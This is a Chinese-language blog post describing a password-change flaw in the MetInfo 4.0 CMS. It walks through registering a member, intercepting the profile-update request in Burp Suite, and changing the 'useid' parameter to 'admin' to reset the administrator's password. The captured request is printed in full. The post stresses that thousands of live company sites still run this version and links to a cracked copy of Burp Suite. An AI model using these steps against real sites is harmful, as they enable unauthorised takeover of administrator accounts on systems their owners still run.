MetInfo4.0任意用户密码修改（包括管理员）漏洞――小残

简要描述：MetInfo4.0注册会员后，可以修改任意用户和管理员密码，影响巨大百度或者谷歌里可以找到上千用MetInfo4.0的企业站，危害特别严重！ 详细说明：百度搜索随便就一大堆，此前没有看到过这个版本的漏洞导致很多人还在继续用4.0版本漏洞页面:member/save.php 注册页面:/member/ 默认后台:/admin先注册一个用户然后登录后点击修改基本资料填写好修改的密码后打开抓包工具进行抓包这里我使用Burp Suite如果没有的朋友可以去博客前面的文章下载《渗透测试神器Burp Suite v1.6.17破解版下载》先用火狐设置下http代理 IP为本地:127.0.0.1 端口要和Burp Suite的端口一样 都是8080默认的Burp Suite监听端口都是8080的设置好后点击添加信息即可看到如下内容
Cookie: PHPSESSID=004c459b13c11bcf58a388a87942abfbContent-Type: application/x-www-form-urlencodedContent-Length: 296useid=caonima&lang=cn&pass1=123456.&pass2=123456.&realname=&sex=1&tel=&mobile=&email=123456%40qq.com&qq=&msn=&taobao=&admin_introduction=&companyname=%E8%8D%89%E6%B3%A5%E9%A9%AC%E5%85%AC%E5%8F%B8&companyfax=&companycode=&companyaddress=&companywebsite=&Submit=%E6%8F%90%E4%BA%A4%E4%BF%A1%E6%81%AF

现在要做的就是修改包的内容 将
useid=caonima //修改成管理员的用户名admin 然后把包放出去即可修改成功。！
点击intercept is on 即可！发送出去 ,如果在网页中提示如下即修改密码成功
修改就可以使用刚才修改的密码登录admin管理员帐号了